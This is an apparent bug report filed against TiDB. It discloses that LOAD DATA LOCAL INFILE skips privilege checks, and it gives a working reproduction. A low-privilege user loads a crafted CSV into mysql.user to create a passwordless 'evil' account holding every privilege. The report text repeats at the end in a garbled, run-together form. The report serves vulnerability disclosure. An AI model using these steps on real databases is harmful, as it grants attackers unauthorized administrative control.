The LOAD DATA statement does not privilege check. Thus, with the usage privilege (i.e. only permission to connect to MySQL) I can insert into the privileges table to grant an escalation. This does not take effect immediate, as a FLUSH PRIVILEGES event has to run.
2. What did you expect to see?
Privilege error.
3. What did you see instead?
$ echo "%,evil,,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y" > /tmp/create-evil-user.csv
mysql> CREATE USER nobody;
^C
$ mysql -unobody
..
mysql> LOAD DATA LOCAL INFILE '/tmp/create-evil-user.csv' INTO TABLE mysql.user FIELDS TERMINATED BY ','
(Host,User,authentication_string,select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,process_priv,grant_priv,references_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,index_priv,create_user_priv,event_priv,trigger_priv,create_role_priv,drop_role_priv,account_locked,shutdown_priv,reload_priv,file_priv);
...
mysql> select * from mysql.user where user='evil'\G
*************************** 1. row ***************************
Host: %
User: evil
authentication_string:
Select_priv: Y
Insert_priv: Y
Update_priv: Y
Delete_priv: Y
Create_priv: Y
Drop_priv: Y
Process_priv: Y
Grant_priv: Y
References_priv: Y
Alter_priv: Y
Show_db_priv: Y
Super_priv: Y
Create_tmp_table_priv: Y
Lock_tables_priv: Y
Execute_priv: Y
Create_view_priv: Y
Show_view_priv: Y
Create_routine_priv: Y
Alter_routine_priv: Y
Index_priv: Y
Create_user_priv: Y
Event_priv: Y
Trigger_priv: Y
Create_role_priv: Y
Drop_role_priv: Y
Account_locked: Y
Shutdown_priv: Y
Reload_priv: Y
FILE_priv: Y
1 row in set (0.00 sec)
4. What version of TiDB are you using? (tidb-server -V or run select tidb_version(); on TiDB)
mysql> SELECT tidb_version()\G
*************************** 1. row ***************************
tidb_version(): Release Version: v4.0.0-beta.2-290-ga0c740784
Git Commit Hash: a0c7407846fbc84f939afbc091f2db54f48c1bfa
Git Branch: master
UTC Build Time: 2020-04-17 04:04:45
GoVersion: go1.13
Race Enabled: false
TiKV Min Version: v3.0.0-60965b006877ca7234adaced7890d7b029ed1306
Check Table Before Drop: false
1 row in set (0.01 sec)
Bug Report
1. What did you do?
The
LOAD DATA
statement does not privilege check. Thus, with the usage privilege (i.e. only permission to connect to MySQL) I can insert into the privileges table to grant an escalation. This does not take effect immediate, as aFLUSH PRIVILEGES
event has to run.2. What did you expect to see?
Privilege error.
3. What did you see instead?
4. What version of TiDB are you using? (
tidb-server -V
or runselect tidb_version();
on TiDB)